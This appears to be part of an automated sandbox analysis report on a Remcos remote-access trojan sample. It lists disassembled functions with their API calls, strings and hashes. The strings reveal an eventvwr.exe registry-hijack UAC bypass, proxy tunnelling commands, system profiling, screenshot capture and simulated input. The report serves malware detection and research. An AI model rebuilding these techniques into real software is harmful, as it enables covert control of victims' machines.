                            Similarity
                            • API ID: LongNamePath
                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                            • API String ID: 82841172-425784914
                            • Opcode ID: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                            • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                            • Opcode Fuzzy Hash: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                            • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                            • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                            • __dosmaperr.LIBCMT ref: 00438646
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                            • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                            • __dosmaperr.LIBCMT ref: 00438683
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                            • __dosmaperr.LIBCMT ref: 004386D7
                            • _free.LIBCMT ref: 004386E3
                            • _free.LIBCMT ref: 004386EA
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                            • String ID:
                            • API String ID: 2441525078-0
                            • Opcode ID: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                            • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
                            • Opcode Fuzzy Hash: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                            • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID: pF$tF
                            • API String ID: 269201875-2954683558
                            • Opcode ID: fb15eab2332ee79fe3b6269c7a6798f30c580aa4b0380318a35312f844840a90
                            • Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
                            • Opcode Fuzzy Hash: fb15eab2332ee79fe3b6269c7a6798f30c580aa4b0380318a35312f844840a90
                            • Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58
                            APIs
                            • SetEvent.KERNEL32(?,?), ref: 0040549F
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                            • TranslateMessage.USER32(?), ref: 0040555E
                            • DispatchMessageA.USER32(?), ref: 00405569
                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                            • String ID: CloseChat$DisplayMessage$GetMessage
                            • API String ID: 2956720200-749203953
                            • Opcode ID: 38da9913c1d94b4fc4e25114756b75ad617155bf13c772cc5ff9b28bcc7bf55c
                            • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                            • Opcode Fuzzy Hash: 38da9913c1d94b4fc4e25114756b75ad617155bf13c772cc5ff9b28bcc7bf55c
                            • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                            APIs
                              • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                            • CloseHandle.KERNEL32(00000000), ref: 00416123
                            • DeleteFileA.KERNEL32(00000000), ref: 00416132
                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                            • String ID: <$@$@%G$@%G$Temp
                            • API String ID: 1704390241-4139030828
                            • Opcode ID: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                            • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                            • Opcode Fuzzy Hash: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                            • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                            • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                            • Opcode Fuzzy Hash: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                            • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                            APIs
                            • _free.LIBCMT ref: 00445645
                              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                            • _free.LIBCMT ref: 00445651
                            • _free.LIBCMT ref: 0044565C
                            • _free.LIBCMT ref: 00445667
                            • _free.LIBCMT ref: 00445672
                            • _free.LIBCMT ref: 0044567D
                            • _free.LIBCMT ref: 00445688
                            • _free.LIBCMT ref: 00445693
                            • _free.LIBCMT ref: 0044569E
                            • _free.LIBCMT ref: 004456AC
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                            • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                            • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                            • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                            APIs
                            • __EH_prolog.LIBCMT ref: 00417F6F
                            • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
                            • Sleep.KERNEL32(000003E8), ref: 004180B3
                            • GetLocalTime.KERNEL32(?), ref: 004180BB
                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                            • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                            • API String ID: 489098229-3790400642
                            • Opcode ID: 27953ccb73c7935c50ce76e498ac53549bd0f641fbc99231dbf637836dbf8ac1
                            • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
                            • Opcode Fuzzy Hash: 27953ccb73c7935c50ce76e498ac53549bd0f641fbc99231dbf637836dbf8ac1
                            • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
                            APIs
                            • Sleep.KERNEL32(00001388), ref: 00409738
                              • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                              • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                              • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                              • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
                            • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                              • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                            • String ID: H"G$H"G
                            • API String ID: 3795512280-1424798214
                            • Opcode ID: 13e2dbf3d5e885c0786faa6bc9ba80587d0ab8a2a4bc2c59858fca73f58dbc4d
                            • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                            • Opcode Fuzzy Hash: 13e2dbf3d5e885c0786faa6bc9ba80587d0ab8a2a4bc2c59858fca73f58dbc4d
                            • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A
                            APIs
                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: DecodePointer
                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                            • API String ID: 3527080286-3064271455
                            • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                            • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
                            • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                            • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                              • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                            • Sleep.KERNEL32(00000064), ref: 00415A46
                            • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CreateDeleteExecuteShellSleep
                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                            • API String ID: 1462127192-2001430897
                            • Opcode ID: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                            • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                            • Opcode Fuzzy Hash: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                            • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                            • ExitProcess.KERNEL32 ref: 00406782
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteExitProcessShell
                            • String ID: H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                            • API String ID: 1124553745-1488154373
                            • Opcode ID: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                            • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                            • Opcode Fuzzy Hash: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                            • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                            APIs
                            • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                            • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocConsoleShowWindow
                            • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                            • API String ID: 4118500197-4025029772
                            • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                            • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                            • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                            • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                              • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                              • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                              • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                            • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                            • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                            • TranslateMessage.USER32(?), ref: 0041B29E
                            • DispatchMessageA.USER32(?), ref: 0041B2A8
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                            • String ID: Remcos
                            • API String ID: 1970332568-165870891
                            • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                            • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
                            • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                            • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                            • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
                            • Opcode Fuzzy Hash: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                            • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
                            APIs
                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045100F
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451092
                            • __alloca_probe_16.LIBCMT ref: 004510CA
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0045123C,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451125
                            • __alloca_probe_16.LIBCMT ref: 00451174
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045113C
                              • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 004511B8
                            • __freea.LIBCMT ref: 004511E3
                            • __freea.LIBCMT ref: 004511EF
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                            • String ID:
                            • API String ID: 201697637-0
                            • Opcode ID: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
                            • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
                            • Opcode Fuzzy Hash: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
                            • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
                            APIs
                              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                            • _memcmp.LIBVCRUNTIME ref: 00442935
                            • _free.LIBCMT ref: 004429A6
                            • _free.LIBCMT ref: 004429BF
                            • _free.LIBCMT ref: 004429F1
                            • _free.LIBCMT ref: 004429FA
                            • _free.LIBCMT ref: 00442A06
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorLast$_abort_memcmp
                            • String ID: C
                            • API String ID: 1679612858-1037565863
                            • Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                            • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                            • Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                            • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: tcp$udp
                            • API String ID: 0-3725065008
                            • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                            • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                            • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                            • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Eventinet_ntoa
                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                            • API String ID: 3578746661-168337528
                            • Opcode ID: c3d225834e3254adb17b52a5ed13ece1e9c6b305f91900c89a6b7ea0c4643d74
                            • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
                            • Opcode Fuzzy Hash: c3d225834e3254adb17b52a5ed13ece1e9c6b305f91900c89a6b7ea0c4643d74
                            • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
                            APIs
                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                            • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                            • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                            • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                              • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,00404C29,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404B85
                              • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                            • String ID: .part
                            • API String ID: 1303771098-3499674018
                            • Opcode ID: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                            • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                            • Opcode Fuzzy Hash: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                            • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043E2F6,0043E2F6,?,?,?,00447215,00000001,00000001,80E85006), ref: 0044701E
                            • __alloca_probe_16.LIBCMT ref: 00447056
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00447215,00000001,00000001,80E85006,?,?,?), ref: 004470A4
                            • __alloca_probe_16.LIBCMT ref: 0044713B
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,80E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
                            • __freea.LIBCMT ref: 004471AB
                              • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                            • __freea.LIBCMT ref: 004471B4
                            • __freea.LIBCMT ref: 004471D9
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                            • String ID:
                            • API String ID: 3864826663-0
                            • Opcode ID: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                            • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
                            • Opcode Fuzzy Hash: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                            • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
                            APIs
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
